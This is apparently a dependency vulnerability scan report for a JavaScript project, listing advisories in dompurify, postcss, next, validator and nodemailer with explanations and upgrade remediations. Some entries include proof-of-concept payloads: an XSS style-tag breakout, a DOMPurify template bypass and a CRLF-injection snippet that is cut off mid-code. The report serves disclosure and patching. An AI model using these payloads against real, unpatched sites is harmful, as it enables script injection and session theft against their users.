  • Vulnerable module: dompurify
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 dompurify@3.1.4
    Remediation: Upgrade to swagger-ui-react@5.32.1.

Overview

dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.

Affected versions of this package are vulnerable to Permissive List of Allowed Inputs in the ADD_ATTR predicate function via EXTRA_ELEMENT_HANDLING.attributeCheck. An attacker can inject and execute malicious scripts in the DOM by bypassing URI validation for specific attribute and tag combinations, such as allowing href attributes with unsafe protocols like javascript:.

Remediation

Upgrade dompurify to version 3.3.2 or higher.

References

Permissive List of Allowed Inputs vulnerability report

medium severity

Prototype Pollution

  • Vulnerable module: dompurify
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 dompurify@3.1.4
    Remediation: Upgrade to swagger-ui-react@5.32.1.

Overview

dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.

Affected versions of this package are vulnerable to Prototype Pollution in the USE_PROFILES function. An attacker can execute arbitrary JavaScript code in the context of the user’s browser by polluting Array.prototype with event handler attributes, causing the sanitizer to incorrectly allow dangerous attributes such as onclick.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade dompurify to version 3.3.2 or higher.

References

Prototype Pollution vulnerability report

medium severity
new

Cross-site Scripting (XSS)

  • Vulnerable module: postcss
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13 postcss@8.4.31

Overview

postcss is a PostCSS is a tool for transforming styles with JS plugins.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in CSS Stringify Output. An attacker can execute arbitrary JavaScript code in the context of the affected web page by submitting crafted CSS containing </style> sequences that are not properly escaped when embedded within HTML <style> tags.

PoC

const postcss = require('postcss');

// Parse user CSS and re-stringify for page embedding
const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const ast = postcss.parse(userCSS);
const output = ast.toResult().css;
const html = `<style>${output}</style>`;

console.log(html);
// <style>body { content: "</style><script>alert(1)</script><style>"; }</style>
//
// Browser: </style> closes the style tag, <script> executes

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade postcss to version 8.5.10 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity

Improper Validation of Specified Type of Input

  • Vulnerable module: validator
  • Introduced through: validator@13.12.0

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer validator@13.12.0
    Remediation: Upgrade to validator@13.15.20.

Overview

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input in the isURL() function which does not take into account : as the delimiter in browsers. An attackers can bypass protocol and domain validation by crafting URLs that exploit the discrepancy in protocol parsing that can lead to Cross-Site Scripting and Open Redirect attacks.

Remediation

Upgrade validator to version 13.15.20 or higher.

References

Improper Validation of Specified Type of Input vulnerability report

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: dompurify
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 dompurify@3.1.4
    Remediation: Upgrade to swagger-ui-react@5.32.1.

Overview

dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in the createDOMPurify() function, via comments embedded in XML noscript, xmp, noembed, noframes, and iframe attributes containing scripts.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade dompurify to version 2.5.9, 3.3.2 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: dompurify
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 dompurify@3.1.4
    Remediation: Upgrade to swagger-ui-react@5.32.1.

Overview

dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in the createDOMPurify() function, via comments embedded in XML textarea attributes containing scripts.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade dompurify to version 3.2.7 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity
new

Cross-site Scripting (XSS)

  • Vulnerable module: dompurify
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 dompurify@3.1.4
    Remediation: Upgrade to swagger-ui-react@5.32.1.

Overview

dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) leading to cross-site scripting, via custom elements. When CUSTOM_ELEMENT_HANDLING is not enabled, and an attacker has already polluted the prototype of objects supplied to DOMPurify.sanitize(), the tagNameCheck and attributeNameCheck regex values allow arbitrary custom elements including event handlers to bypass sanitization.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade dompurify to version 3.4.0 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity
new

Cross-site Scripting (XSS)

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.16.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in the beforeInteractive process, when untrusted input is embedded without proper escaping. An attacker can execute arbitrary JavaScript in a user's browser by injecting malicious content into the serialized script.

Workaround

This vulnerability can be mitigated by not passing untrusted data into beforeInteractive scripts, or by sanitizing or escaping the content before embedding it.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade next to version 15.5.16, 16.2.5 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity

MPL-2.0 license

  • Module: @vercel/analytics
  • Introduced through: @vercel/analytics@1.3.1

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer @vercel/analytics@1.3.1

MPL-2.0 license

MPL-2.0 license vulnerability report

low severity
new

Cross-site Scripting (XSS)

  • Vulnerable module: dompurify
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 dompurify@3.1.4
    Remediation: Upgrade to swagger-ui-react@5.32.1.

Overview

dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via templates injected to a site in RETURN_DOM mode. The SAFE_FOR_TEMPLATES sanitization can be bypassed, which then allows scripts to be executed if the template is evaluated by a framework such as Vue 2. An application is only vulnerable if it has SAFE_FOR_TEMPLATES: true, and RETURN_DOM: true or RETURN_DOM_FRAGMENT: true set.

PoC

<!DOCTYPE html>
<html>

<body>
  <script src="https://cdn.jsdelivr.net/npm/dompurify@3.3.3/dist/purify.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/vue@2.7.16/dist/vue.min.js"></script>
  <script>
    var dirty = '<div id="app">{<foo></foo>{constructor.constructor("alert(1)")()}<foo></foo>}</div>';
    var dom = DOMPurify.sanitize(dirty, { SAFE_FOR_TEMPLATES: true, RETURN_DOM: true });
    document.body.appendChild(dom.firstChild);
    new Vue({ el: '#app' });
  </script>
</body>

</html>

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade dompurify to version 3.4.0 or higher.

References

Cross-site Scripting (XSS) vulnerability report

low severity
new

Cross-site Scripting (XSS)

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@15.5.16.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the CSP nonce headers. An attacker can inject malicious scripts into cached HTML responses by supplying malformed nonce values, which may then be executed in the browsers of subsequent visitors. This is possible when applications are deployed behind shared caches and rely on request-derived nonce values.

Workaround

This vulnerability can be mitigated by stripping inbound Content-Security-Policy request headers from untrusted traffic.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade next to version 15.5.16, 16.2.5 or higher.

References

Cross-site Scripting (XSS) vulnerability report

low severity

Missing Origin Validation in WebSockets

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@14.2.30.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Missing Origin Validation in WebSockets when running next dev and the project uses the App Router. An attacker can access the source code of client components by exploiting the Cross-site WebSocket hijacking (CSWSH) attack when a user visits a malicious link while having the server running locally.

Workarounds

  1. Avoid browsing untrusted websites while running the local development server.

  2. Implement local firewall or proxy rules to block unauthorized WebSocket access to localhost.

Remediation

Upgrade next to version 14.2.30, 15.2.2 or higher.

References

Missing Origin Validation in WebSockets vulnerability report

low severity

Missing Source Correlation of Multiple Independent Data

  • Vulnerable module: next
  • Introduced through: next@14.2.13

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer next@14.2.13
    Remediation: Upgrade to next@14.2.31.

Overview

next is a react framework.

Affected versions of this package are vulnerable to Missing Source Correlation of Multiple Independent Data in image-optimizer. An attacker can cause arbitrary files to be downloaded with attacker-controlled content and filenames by supplying malicious external image sources.

Note: This is only exploitable if the application is configured to allow external image sources via the images.domains or images.remotePatterns configuration.

Remediation

Upgrade next to version 14.2.31, 15.4.2-canary.19, 15.4.5 or higher.

References

Missing Source Correlation of Multiple Independent Data vulnerability report

low severity

CRLF Injection

  • Vulnerable module: nodemailer
  • Introduced through: supertokens-node@20.1.2

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer supertokens-node@20.1.2 nodemailer@6.10.1
    Remediation: Upgrade to supertokens-node@24.0.2.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to CRLF Injection via the envelope.size parameter in the sendMail function. An attacker can inject arbitrary SMTP commands by supplying CRLF characters in the size property, which are concatenated directly into the SMTP command stream. This can result in unauthorized recipients being added to outgoing emails or other SMTP commands being executed.

Note:

This is only exploitable if the application explicitly passes a custom envelope object with a user-controlled size property to the mail sending process.

PoC

const net = require('net');
const nodemailer = require('nodemailer');

// Minimal SMTP server that logs raw commands
const server = net.createServer(socket => {
    socket.write('220 localhost ESMTP\r\n');
    let buffer = '';
    socket.on('data', chunk => {
        buffer += chunk.toString();
        const lines = buffer.split('\r\n');
        buffer = lines.pop();
        for (const line of lines) {
            if (!line) continue;
            console.log('C:', line);
            if (line.startsWith('EHLO')) {
                socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
            } else if (line.startsWith('MAIL FROM')) {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('RCPT TO')) {
                socket.write('250 OK\r\n');
            } else if (line === 'DATA') {
                socket.write('354 Start\r\n');
            } else if (line === '.') {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('QUIT')) {
                socket.write('221 Bye\r\n');
                socket.end();
            }
        }
    });
});

server.listen(0, '127.0.0.1', () => {
    const port = server.address().port;
    console.log('SMTP server on port', port);
    console.log('Sending email with injected RCPT TO...\n');

    const transporter = nodemailer.createTransport({
        host: '127.0.0.1',
        port,
        secure: false,
